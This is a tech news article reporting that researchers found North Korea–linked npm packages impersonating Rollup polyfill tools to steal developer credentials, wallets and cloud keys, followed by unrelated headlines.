npm packages associated with North Korea are masquerading as Rollup polyfill tools in an attempt to steal developers' sensitive information.

npm packages associated with North Korea are masquerading as Rollup polyfill tools in an attempt to steal developers' sensitive information.

      TL;DR: Six malicious npm packages posing as Rollup polyfill tools stole developer credentials and facilitated remote access in a campaign linked to Lazarus.

      Security researchers from JFrog have discovered a group of malicious npm packages associated with North Korean threat actors. These packages imitate genuine Rollup polyfill tools to steal developer credentials and provide remote access to compromised systems. The packages, titled “rollup-packages-polyfill-core” and “rollup-runtime-polyfill-core,” closely imitate the legitimate “rollup-plugin-polyfill-node” project in terms of description, repository details, and package organization. All six packages have since been removed from the npm registry.

      The attack uses a multi-layered delivery method designed to avoid detection. The initial packages install concealed second-stage dependencies disguised as SVG utilities, which then retrieve a JSON object from a remote service and execute the embedded payload. JFrog indicated that the design, along with similar names, credible metadata, and environment checks to evade sandboxes and cloud development platforms, aligns with earlier npm campaigns associated with Lazarus.

      Once executed, the malware provides the attacker with capabilities for both data collection and control over the compromised machine. The payload captures data from web browsers and cryptocurrency wallets, periodically records clipboard content, and collects files with specific extensions. It also targets configurations for developer tools such as VS Code, Windsurf, and Cursor, as well as credentials for AWS, Microsoft Azure, Google Gemini, Anthropic Claude, and SSH keys.

      This campaign is part of a broader trend. In April, Panther researchers documented an ongoing Lazarus npm operation that released 108 malicious packages across 261 versions to deploy BeaverTail and OtterCookie, two known malware families linked to the Contagious Interview campaign. The latest packages exhibit similarities with OtterCookie, including the use of a modified keyboard and mouse control library that allows for interactive remote sessions, screenshot capture, and simulated user input on compromised Windows machines.

      This announcement coincides with a larger wave of supply chain attacks targeting open-source package repositories. Researchers from Checkmarx, SafeDep, and AWS have separately uncovered clusters of malicious packages across npm and PyPI that are designed to steal cloud credentials, cryptocurrency wallets, SSH keys, and developer secrets. Rollup plugins are frequently utilized in developer workstations and CI build pipelines, environments that are increasingly susceptible to supply chain compromises and often contain access to sensitive assets like source code, API keys, and project secrets.

      Published July 3, 2026 - 4:55 pm UTC

Other articles

Elon Musk denies reports suggesting that SpaceX is working on an AI device. Elon Musk denies reports suggesting that SpaceX is working on an AI device. Elon Musk referred to a Wall Street Journal report as "completely false" after it alleged that SpaceX presented investors with a handset-like AI device prior to its IPO. Why developing AI for educational institutions is more challenging than creating a chatbot: an overview of Smartschool's strategy for exam preparation. Why developing AI for educational institutions is more challenging than creating a chatbot: an overview of Smartschool's strategy for exam preparation. Smartschool, an edtech startup from Palo Alto established by three Polish entrepreneurs, developed a proprietary mathematical reasoning engine that boasts a 99.6 percent accuracy rate for high school mathematics. This technology has been embraced by 30 school districts in the United States, including New York City and Boston. Alibaba prohibits Claude Code due to concealed tracking of Chinese users. Alibaba prohibits Claude Code due to concealed tracking of Chinese users. Alibaba categorized Anthropic's Claude Code as high-risk software after researchers discovered steganographic markers that identified Chinese users based on their timezone and proxy. AI chip stocks fell by 12% over two days as investors searched for new profitable opportunities. AI chip stocks fell by 12% over two days as investors searched for new profitable opportunities. The PHLX Semiconductor Index dropped 12% over two trading days, while the Dow reached an all-time high. As Q2 earnings come closer, investors are shifting their focus from AI chips to software. Alibaba prohibits Claude Code due to concealed tracking of Chinese users. Alibaba prohibits Claude Code due to concealed tracking of Chinese users. Alibaba categorized Anthropic's Claude Code as high-risk software following researchers' discovery of steganographic markers that identified Chinese users based on their timezone and proxy. The Chevy Silverado EV is among the finest electric trucks ever made, yet why are sales so low? The Chevy Silverado EV is among the finest electric trucks ever made, yet why are sales so low? Last year, GM sold about 14,000 Silverado EVs, whereas the gasoline version sells ten times that amount each quarter, and a more affordable battery is still two years off.

npm packages associated with North Korea are masquerading as Rollup polyfill tools in an attempt to steal developers' sensitive information.

Malicious npm packages that impersonate Rollup polyfill tools are designed to steal browser data, cryptocurrency wallets, and credentials for AI tools in a campaign associated with Lazarus.